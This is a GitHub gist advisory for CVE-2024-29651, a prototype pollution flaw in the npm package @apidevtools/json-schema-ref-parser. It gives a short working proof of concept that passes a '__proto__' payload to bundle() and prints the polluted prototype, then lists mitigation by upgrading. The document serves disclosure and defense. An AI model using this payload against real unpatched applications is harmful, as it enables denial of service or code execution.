Skip to content

Instantly share code, notes, and snippets.

@tariqhawis

tariqhawis/CVE-2024-29651.md

Last active October 2, 2024 02:49
Show Gist options
  • Save tariqhawis/5db76b38112bba756615b688c32409ad to your computer and use it in GitHub Desktop.
Save tariqhawis/5db76b38112bba756615b688c32409ad to your computer and use it in GitHub Desktop.
Download ZIP
(CVE-2024-29651) Prototype Pollution vulnerability affecting @apidevtools/json-schema-ref-parser, versions 11.0.0, 11.1.0
Raw
CVE-2024-29651.md

Overview

json-schema-ref-parser is an NPM package for Parse, Resolve, and Dereference JSON Schema $ref pointers.

Affected versions of this package are vulnerable to Prototype Pollution. An attacker can manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by passing specially crafted input to this function.

Details:

The vulnerable functions: bundle(), parse(), resolve(), dereference() passes the argument options to an unsafe merge method, which recursively copy properties from one object to another. Such a function has the potential to modify any object reachable from the destination object, and the built-in Object.prototype is usually reachable through the special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

The call stack :

getNewOptions (@apidevtools/json-schema-ref-parser/dist/lib/options.js:80)
normalizeArgs (@apidevtools/json-schema-ref-parser/dist/lib/normalize-args.js:35)
$RefParser.parse (@apidevtools/json-schema-ref-parser/dist/lib/index.js:71)
Module.parse (@apidevtools/json-schema-ref-parser/dist/lib/index.js:138

PoC:

(async () => {
  const lib = await import('@apidevtools/json-schema-ref-parser');
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {}
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // uncomment one at a time
    lib.bundle({},BAD_JSON,{})
    //lib.parse ({},BAD_JSON,{})
    //lib.resolve ({}, BAD_JSON,{})
    //lib.dereference ({}, BAD_JSON,{})
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted;
})();

Output:

Before Attack: {}
After Attack: {"polluted":true}

Mitigation

Upgrade the package to 11.2.0 or a newer version.

How to prevent:

To prevent your javascript code from getting vulnerable to prototype pollution, please refer to the recommendations listed in this article Snyk.io

Reference: https://github.com/APIDevTools/json-schema-ref-parser/commit/8cad7f72c15b198f4d0b5b1c8a3a979b2e4baa82 https://gist.github.com/tariqhawis/5db76b38112bba756615b688c32409ad

@jayvdb
Copy link

jayvdb commented Oct 2, 2024

Please see APIDevTools/swagger-parser#255 (comment) - I think the effected range goes back much further

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment